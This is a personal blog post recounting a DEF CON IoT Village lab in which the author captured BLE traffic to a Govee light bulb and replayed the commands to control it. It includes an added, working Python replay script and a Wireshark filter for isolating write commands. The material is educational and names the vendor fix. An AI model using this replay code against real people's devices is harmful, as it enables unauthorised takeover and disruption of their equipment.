Defcon 2024 - Hacking Govee IoT Light Bulbs

Tanner

I wanted to share an amazing hands-on lab experience I had at DEFCON. If you’re on the fence about attending, I highly recommend it! I was fortunate enough to be sent by my company, and it turned out to be one of the best experiences of my life. Here’s a little blog I wrote about one of my standout moments at DEFCON — I hope it inspires you to check it out for yourself!

In today’s technological society, you likely have a few IoT devices in your household. A study revealed that among 1,500 families surveyed, respondents believed they had at least eight IoT-connected devices in their homes. These devices add convenience and simplicity to everyday life: why get up from the couch to turn on the lights when you can ask Alexa to do it for you? However, this convenience may come at a cost. Many IoT devices have been found to be vulnerable due to poor security practices. Common weaknesses include outdated firmware, missing authentication and encryption, and sloppy protocol implementations, which open the door to man-in-the-middle and replay attacks over transports such as Bluetooth Low Energy (BLE).

One of the most unique villages at DEFCON was the IoT (Internet of Things) Village. The IoT Village focuses on improving security in the IoT industry by fostering collaboration between researchers and industry professionals. Within the IoT Village, there's a feature called the "Hacking Playground," which offers hands-on labs designed to teach the tools and techniques for discovering and exploiting common weaknesses in IoT devices, including Bluetooth Low Energy (BLE).

I participated in one of the BLE labs, where I analyzed BLE traffic and executed attacks using Python to control an IoT device. BLE is designed for low power consumption, making it ideal for IoT devices. The protocol does support pairing and link-layer encryption, but it does not require them: a peripheral can accept connections and GATT writes from any central with no pairing at all, and many consumer devices ship that way. When a device accepts unauthenticated, unencrypted commands, anyone who can capture those commands can replay them.

In the hands-on exercise, we exploited a Govee lightbulb using BLE, showcasing a classic replay attack. A replay attack is a type of network attack where an attacker intercepts and captures valid data transmissions between two systems and then retransmits them later to trick the system into performing unauthorized actions. We captured the BLE traffic using a Bluetooth sniffing device integrated with Wireshark. The lightbulbs were on constant automation, transmitting traffic every few seconds, allowing us to capture the BLE packets. The exercise guided us in analyzing the traffic to identify commands that controlled the lightbulb's on/off state and color changes. Using Python, we connected to the Govee lightbulb via its MAC address, replayed the captured commands, and successfully controlled the lightbulb. The device accepted the commands because it lacked the necessary security checks, such as encryption and authentication, to distinguish between legitimate and unauthorized commands.
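The workflow described above, as an added example that is not code from the post or from the IoT Village lab: pull the ATT Write PDUs out of a capture, work out which handle carries the control commands, and write the same bytes back to the bulb by its address. The capture below is constructed, the address `AA:BB:CC:DD:EE:FF`, the handles `0x0015`/`0x0018` and the value bytes are placeholders rather than real Govee frames, and the replay uses the third-party `bleak` library.

```python
"""Parse ATT Write PDUs from a BLE capture and replay them to a bulb.

Added example, not code from the original post. All addresses, handles and
value bytes below are constructed placeholders.
"""
import asyncio
from collections import defaultdict

# ATT opcodes (Bluetooth Core Specification, Attribute Protocol)
ATT_READ_REQUEST = 0x0A
ATT_WRITE_REQUEST = 0x12
ATT_WRITE_COMMAND = 0x52   # write without response: the usual fire-and-forget control path
ATT_HANDLE_VALUE_NOTIFICATION = 0x1B

# Constructed sample capture: the ATT payload of each packet as a sniffer feeding
# Wireshark would decode it, laid out as opcode, handle (little-endian), value.
CAPTURED_PDUS = [
    bytes.fromhex("521500aa01"),      # Write Command, handle 0x0015, value aa01     ("on", placeholder)
    bytes.fromhex("1b1700ff"),        # notification from the bulb, not a write
    bytes.fromhex("521500aa00"),      # Write Command, handle 0x0015, value aa00     ("off", placeholder)
    bytes.fromhex("12180001"),        # Write Request, handle 0x0018, value 01       (one-off setup write)
    bytes.fromhex("521500bbff0000"),  # Write Command, handle 0x0015, value bbff0000 ("colour", placeholder)
    bytes.fromhex("521500aa01"),      # the automation loop repeats "on"
    bytes.fromhex("0a1700"),          # Read Request, not a write
]


def parse_att_write(pdu: bytes):
    """Return (opcode, handle, value) for a Write Command/Request PDU, else None."""
    if len(pdu) < 3 or pdu[0] not in (ATT_WRITE_COMMAND, ATT_WRITE_REQUEST):
        return None
    handle = int.from_bytes(pdu[1:3], "little")
    return pdu[0], handle, pdu[3:]


def group_writes_by_handle(pdus):
    """Map each written handle to the distinct values sent to it, in capture order."""
    groups = defaultdict(list)
    for pdu in pdus:
        parsed = parse_att_write(pdu)
        if parsed is None:
            continue
        _, handle, value = parsed
        if value not in groups[handle]:
            groups[handle].append(value)
    return dict(groups)


def select_control_handle(groups):
    """Pick the handle with the most distinct values: a bulb cycling on/off and
    colours in an automation loop writes many different values to one handle,
    while setup writes (CCCD enables, etc.) are one-offs."""
    return max(groups, key=lambda h: (len(groups[h]), -h))


async def replay(address: str, handle: int, values, gap_s: float = 1.0):
    """Connect to the bulb by address and write the captured values back verbatim.

    No pairing or bonding is requested. If the bulb acts on these writes anyway,
    its control characteristic has no authentication and no replay protection.
    """
    from bleak import BleakClient  # pip install bleak; imported lazily so the parser runs without it
    async with BleakClient(address) as client:
        for value in values:
            await client.write_gatt_char(handle, value, response=False)
            await asyncio.sleep(gap_s)


if __name__ == "__main__":
    groups = group_writes_by_handle(CAPTURED_PDUS)
    ctrl = select_control_handle(groups)
    print(f"control handle 0x{ctrl:04x}: {[v.hex() for v in groups[ctrl]]}")
    # Placeholder address; use the peripheral address shown in the capture.
    asyncio.run(replay("AA:BB:CC:DD:EE:FF", ctrl, groups[ctrl]))
```

In Wireshark the filter `btatt.opcode == 0x52` isolates the Write Commands before you export them. The check that matters is whether the replay still works with no pairing: a bulb that required LE Secure Connections pairing before accepting writes, or that authenticated each command with a counter or nonce, would reject the replayed bytes, and that is the fix a vendor would need to ship.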

This exercise highlighted the serious security risks inherent in many IoT devices, particularly those using BLE. While these technologies offer convenience and efficiency, they often come with vulnerabilities that can be easily exploited if not properly secured. The hands-on experience at DEF CON’s IoT Village reinforced the importance of robust security measures in IoT devices, as even something as simple as a lightbulb can become a target if the right protections aren't in place.

This exercise really opened my eyes to the serious security risks inherent in many IoT devices, particularly those using BLE. While the exercise didn’t involve stealing credentials or personally identifiable information, it clearly demonstrated how easy it is to cause disruption, effectively a denial of service, by taking control of the lightbulb.
